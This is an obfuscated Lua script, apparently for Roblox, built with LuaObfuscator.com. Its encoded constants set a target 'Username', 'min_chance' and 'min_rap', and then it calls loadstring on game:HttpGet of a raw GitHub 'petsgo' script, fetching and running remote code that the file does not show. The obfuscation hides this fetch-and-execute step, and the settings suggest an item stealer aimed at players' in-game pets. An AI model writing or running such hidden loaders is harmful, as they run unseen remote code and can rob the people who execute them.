--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v113=v5(v89,v19);v19=nil;return v113;else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=0;local v91;while true do if (v90==(0 -0)) then v91=(v31/((5 -(880 -(282 + 595)))^(v32-(1 -0))))%((4 -2)^(((v33-(620 -((2192 -(1523 + 114)) + 64))) -(v32-1)) + (932 -(857 + 67 + 7)))) ;return v91-(v91%(569 -(367 + 201))) ;end end else local v92=((1323 -394) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v92 + v92))>=v92) and (1 + 0)) or 0 ;end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==((282 + 989) -(226 + 1044))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + 0 ;end end end local function v22() local v36=957 -(892 + 65) ;local v37;local v38;while true do if (v36==((2 + 0) -1)) then return (v38 * ((1158 -686) -216)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 84 + 29)) ;v36=1;end end end local function v23() local v39=0;local v40;local v41;local v42;local v43;while true do if (v39==(3 -2)) then return (v43 * ((9774056 + 7004112) -(802 + 150))) + (v42 * (176444 -110908)) + (v41 * (464 -208)) + v40 ;end if (v39==(0 + (0 -0))) then v40,v41,v42,v43=v1(v16,v18,v18 + (1000 -(915 + 82)) );v18=v18 + (11 -7) ;v39=1;end end end local function v24() local v44=1187 -(1069 + 118) ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==3) then if (v49==(0 -0)) then if (v48==(0 -0)) then return v50 * ((0 -0) + 0) ;else local v122=0 -0 ;while true do if ((0 + 0 + 0)==v122) then v49=792 -(131 + 237 + 423) ;v47=0 -0 ;break;end end end elseif (v49==(2065 -(10 + 8))) then return ((v48==0) and (v50 * (((888 -(261 + 624)) -(3 -1))/(442 -(416 + 26))))) or (v50 * NaN) ;end return v8(v50,v49-(3266 -2243) ) * (v47 + (v48/((1 + 1)^((1171 -(1020 + 60)) -39)))) ;end if (v44==1) then v47=1;v48=(v20(v46,439 -((1568 -(630 + 793)) + 293) ,450 -(44 + 386) ) * ((1488 -(998 + 488))^32)) + v45 ;v44=(3 -2) + 1 ;end if ((0 + 0)==v44) then v45=v23();v46=v23();v44=1;end if ((774 -(201 + 571))==v44) then v49=v20(v46,1159 -(116 + 1022) ,128 -(459 -362) );v50=((v20(v46,32)==(1 + 0)) and  -((2 + 1) -2)) or (3 -2) ;v44=862 -(814 + 45) ;end end end local function v25(v51) local v52;if  not v51 then v51=v23();if (v51==(0 -0)) then return "";end end v52=v3(v16,v18,(v18 + v51) -(1748 -(760 + 987)) );v18=v18 + v51 ;local v53={};for v69=1914 -(1789 + 124) , #v52 do v53[v69]=v2(v1(v3(v52,v69,v69)));end return v6(v53);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 0 + 0 ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v93== #":") then if (v94== #" ") then v95=(function() return v96()~=0 ;end)();elseif (v94==(1 + 1)) then v95=(function() return v97();end)();elseif (v94~= #"-19") then else v95=(function() return v98();end)();end v99[v100]=(function() return v95;end)();break;end if (0~=v93) then else local v119=(function() return 0;end)();local v120=(function() return;end)();while true do if (v119~=0) then else v120=(function() return 202 -(14 + 188) ;end)();while true do if ((675 -(534 + 141))~=v120) then else v94=(function() return v96();end)();v95=(function() return nil;end)();v120=(function() return 1 + 0 ;end)();end if (v120==(1 + 0)) then v93=(function() return  #",";end)();break;end end break;end end end end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v55=(function() return function(v101,v102,v103) local v104=(function() return 0 + 0 ;end)();local v105=(function() return;end)();while true do if (v104~=0) then else v105=(function() return 0;end)();while true do if ((0 -0)==v105) then local v123=(function() return 0 -0 ;end)();while true do if (v123~=(0 -0)) then else v101[v102-#"\\" ]=(function() return v103();end)();return v101,v102,v103;end end end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v71= #" ",v60 do FlatIdent_7FAC9,Type,Cons,v21,v24,v25,v61,v71=(function() return v54(FlatIdent_7FAC9,Type,Cons,v21,v24,v25,v61,v71);end)();end v59[ #"91("]=(function() return v21();end)();for v72= #"}",v23() do local v73=(function() return v21();end)();if (v20(v73, #"/", #"[")==(0 + 0)) then local v109=(function() return 396 -(115 + 281) ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109==(2 -1)) then v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==(0 + 0)) then local v124=(function() return 0 -0 ;end)();local v125=(function() return;end)();while true do if (v124==0) then v125=(function() return 0 -0 ;end)();while true do if (v125~=0) then else v112[ #"xnx"]=(function() return v22();end)();v112[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v110== #"]") then v112[ #"91("]=(function() return v23();end)();elseif (v110==(869 -(550 + 317))) then v112[ #"19("]=(function() return v23() -((2 -0)^(22 -6)) ;end)();elseif (v110~= #"19(") then else local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if ((285 -(134 + 151))==v175) then v176=(function() return 0;end)();while true do if (v176==0) then v112[ #"xxx"]=(function() return v23() -(2^16) ;end)();v112[ #"http"]=(function() return v22();end)();break;end end break;end end end v109=(function() return 1667 -(970 + 695) ;end)();end if (v109==(0 -0)) then v110=(function() return v20(v73,2, #"xnx");end)();v111=(function() return v20(v73, #"0313",1996 -(582 + 1408) );end)();v109=(function() return 1;end)();end if (v109~=3) then else if (v20(v111, #"asd", #"19(")== #"~") then v112[ #".dev"]=(function() return v61[v112[ #"0836"]];end)();end v56[v72]=(function() return v112;end)();break;end if (v109==(6 -4)) then if (v20(v111, #"}", #">")== #"~") then v112[2 -0 ]=(function() return v61[v112[2]];end)();end if (v20(v111,7 -5 ,1826 -(1195 + 629) )~= #" ") then else v112[ #"nil"]=(function() return v61[v112[ #"91("]];end)();end v109=(function() return 3 -0 ;end)();end end end end for v74= #"/",v23() do v57,v74,v28=(function() return v55(v57,v74,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[242 -((378 -191) + 54) ];local v67=v63[782 -(162 + 618) ];local v68=v63[3 + 0 ];return function(...) local v75=v66;local v76=v67;local v77=v68;local v78=v27;local v79=1 + 0 ;local v80= -(1 -0);local v81={};local v82={...};local v83=v12("#",...) -(1 + 0) ;local v84={};local v85={};for v106=0,v83 do if (v106>=v77) then v81[v106-v77 ]=v82[v106 + (1637 -(1373 + 263)) ];else v85[v106]=v82[v106 + 1 ];end end local v86=(v83-v77) + ((1066 -(30 + 35)) -(451 + 378 + 171)) ;local v87;local v88;while true do v87=v75[v79];v88=v87[1 + 0 ];if ((v88<=(13 -4)) or (1430>=3612)) then if (v88<=(6 -2)) then if (v88<=(1385 -(746 + 638))) then if (v88>0) then v85[v87[1 + 1 ]]=v87[3];else v85[v87[2 -0 ]]=v65[v87[344 -(218 + 123) ]];end elseif (v88<=(1583 -((2792 -(1043 + 214)) + 46))) then if (v85[v87[2 + 0 ]]==v87[4]) then v79=v79 + 1 + 0 ;else v79=v87[563 -(306 + 254) ];end elseif (v88==(1 + 2)) then local v157=0 -0 ;local v158;local v159;while true do if ((2683>=2460) and (v157==0)) then v158=v87[2];v159=v85[v87[3]];v157=1468 -(899 + 568) ;end if ((v157==(1 + 0)) or (1804>=3275)) then v85[v158 + ((7 -5) -1) ]=v159;v85[v158]=v159[v87[607 -((1480 -(323 + 889)) + 335) ]];break;end end else local v160=v87[292 -(60 + 230) ];v85[v160]=v85[v160](v13(v85,v160 + (573 -(426 + (392 -246))) ,v80));end elseif ((v88<=(1 + 5)) or (1417>3629)) then if (v88>(1461 -(282 + 1174))) then v85[v87[813 -(569 + 242) ]]=v65[v87[8 -5 ]];else v65[v87[3]]=v85[v87[1 + 1 ]];end elseif ((4795>402) and (v88<=((1611 -(361 + 219)) -(706 + 318)))) then v85[v87[(1573 -(53 + 267)) -(721 + 530) ]]=v87[(288 + 986) -(945 + 326) ];elseif ((4813>3565) and (v88>8)) then v85[v87[(417 -(15 + 398)) -2 ]]();else local v162=v87[2];local v163,v164=v78(v85[v162](v13(v85,v162 + 1 + 0 ,v87[(1685 -(18 + 964)) -(271 + 429) ])));v80=(v164 + v162) -(1 + 0) ;local v165=1500 -((5299 -3891) + 54 + 38) ;for v169=v162,v80 do v165=v165 + (1087 -(461 + 625)) ;v85[v169]=v163[v165];end end elseif ((3912==3912) and (v88<=(1302 -(626 + 367 + 295)))) then if ((2821<=4824) and (v88<=(1 + 10))) then if (v88==(1181 -(418 + 753))) then local v140=v87[1 + 1 ];local v141=v85[v87[1 + 2 ]];v85[v140 + 1 + 0 ]=v141;v85[v140]=v141[v87[4]];else local v145=0 + 0 ;local v146;local v147;local v148;local v149;while true do if (v145==2) then for v177=v146,v80 do local v178=529 -(406 + 123) ;while true do if (v178==0) then v149=v149 + (1770 -(1749 + (870 -(20 + 830)))) ;v85[v177]=v147[v149];break;end end end break;end if (v145==0) then v146=v87[1 + 1 ];v147,v148=v78(v85[v146](v13(v85,v146 + (1323 -(1249 + 73)) ,v87[2 + 1 ])));v145=1;end if (v145==(1146 -(466 + 679))) then v80=(v148 + v146) -(2 -(1 + 0)) ;v149=0 -0 ;v145=1902 -(106 + 1794) ;end end end elseif (v88<=(4 + 8)) then if (v85[v87[1 + 1 ]]==v87[11 -(133 -(116 + 10)) ]) then v79=v79 + (2 -1) ;else v79=v87[117 -(4 + 110) ];end elseif (v88>(597 -(57 + 527))) then do return;end else do return;end end elseif ((1738<=2195) and (v88<=(1443 -(41 + 1386)))) then if (v88==((9 + 109) -(17 + 86))) then v65[v87[3]]=v85[v87[2]];else v79=v87[3 + 0 ];end elseif ((41<=3018) and (v88<=(37 -20))) then v79=v87[8 -5 ];elseif (v88==((922 -(542 + 196)) -(122 + 44))) then local v167=0 -0 ;local v168;while true do if (v167==0) then v168=v87[6 -4 ];v85[v168]=v85[v168](v13(v85,v168 + 1 ,v80));break;end end else v85[v87[2 + 0 ]]();end v79=v79 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3Q00028Q00026Q00F03F030A3Q006D696E5F6368616E6365025Q006AF840030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034C3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F446574726F7830312F70657473676F2F726566732F68656164732F6D61696E2F7363726970742E74787403083Q00557365726E616D6503083Q005831335F574F524B03073Q006D696E5F72617000163Q0012013Q00013Q0026023Q000D000100020004103Q000D0001001201000100043Q001205000100033Q00122Q000100053Q00122Q000200063Q00200A000200020007001201000400084Q0008000200044Q000400013Q00022Q00130001000100010004103Q001500010026023Q0001000100010004103Q000100010012010001000A3Q001205000100093Q001201000100023Q0012050001000B3Q0012013Q00023Q0004103Q000100012Q000E3Q00017Q00",v9(),...);
